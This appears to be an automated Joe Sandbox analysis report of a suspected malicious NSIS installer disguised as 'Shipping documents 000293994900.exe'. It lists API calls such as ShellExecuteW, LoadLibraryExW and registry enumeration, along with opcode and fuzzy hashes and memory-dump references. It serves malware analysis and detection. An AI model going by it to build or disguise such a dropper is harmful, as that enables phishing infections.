                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
                                                • Instruction ID: 49947657582026fbe4aef0e17b19bc3bf563a4cedc03dc09487ed5c70e3121f8
                                                • Opcode Fuzzy Hash: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
                                                • Instruction Fuzzy Hash: B521C871904215F6CF206F95CE48A9E7AB0AB09354F70427BF610B51E0D7B94D41DA6E
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: Call
                                                • API String ID: 3394109436-1824292864
                                                • Opcode ID: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
                                                • Instruction ID: 832337492cf7a06c21e2abca279de06bf1a27b56728bc0a7368b5bd0ba670fc7
                                                • Opcode Fuzzy Hash: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
                                                • Instruction Fuzzy Hash: 2321D2B2604101ABCB10DBA4DE8495FB3A8EB49314B24093BF581F33D1D778A8419FAD
                                                APIs
                                                  • Part of subcall function 0040622B: FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
                                                  • Part of subcall function 0040622B: FindClose.KERNEL32(00000000), ref: 00406242
                                                • lstrlenW.KERNEL32 ref: 004021DE
                                                • lstrlenW.KERNEL32(00000000), ref: 004021E9
                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FileFindlstrlen$CloseFirstOperation
                                                • String ID:
                                                • API String ID: 1486964399-0
                                                • Opcode ID: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
                                                • Instruction ID: 6bed8099c30f558e68629b23c483ae923e88bf7bf978b8bddb761e1df3150e64
                                                • Opcode Fuzzy Hash: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
                                                • Instruction Fuzzy Hash: 8C115271D10214A6CB10EFF9C949A9FB7B8EF14314F20843BB511FB2D5D6B899418B59
                                                APIs
                                                  • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Enum$CloseOpenValue
                                                • String ID:
                                                • API String ID: 167947723-0
                                                • Opcode ID: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
                                                • Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
                                                • Opcode Fuzzy Hash: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
                                                • Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A
                                                APIs
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\Uploadable\normallnnens,?), ref: 00401E3D
                                                Strings
                                                • C:\Users\user\Uploadable\normallnnens, xrefs: 00401E26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: C:\Users\user\Uploadable\normallnnens
                                                • API String ID: 587946157-2478767733
                                                • Opcode ID: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
                                                • Instruction ID: 3f653c9cfcf7a787dcf128efd04e0ef48ce3664fdda10e2cbb7d118b60988be6
                                                • Opcode Fuzzy Hash: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
                                                • Instruction Fuzzy Hash: 5EF0F675B54200ABDB006FB5DD4AE9E33B8AB24715F600937F401F70D1D6FC88419629
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: EnumErrorLastWindows
                                                • String ID:
                                                • API String ID: 14984897-0
                                                • Opcode ID: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                                                • Instruction ID: 1e4ae0ab9f7d80da0c6c18ef4be67b5a8e29914e0a0cef2da75b429278759b76
                                                • Opcode Fuzzy Hash: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                                                • Instruction Fuzzy Hash: C651A4BA805214DFFB10EF64DCC2B5937A4EB443D4F22842AEA04D722DCF34A994CB95
                                                APIs
                                                  • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
                                                • Instruction ID: 6c75ae994a47700371a60e183d9c6493363f31bd6906e7075ff81e32be465fed
                                                • Opcode Fuzzy Hash: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
                                                • Instruction Fuzzy Hash: 6E11A071914205EEDB14CFA1DA585AFB7B4EF04358F60843FE042B72D0D6B85A41DB2A
                                                APIs
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 004059EC
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                • lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00405A94
                                                • GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405AA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID:
                                                • API String ID: 3248276644-0
                                                • Opcode ID: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
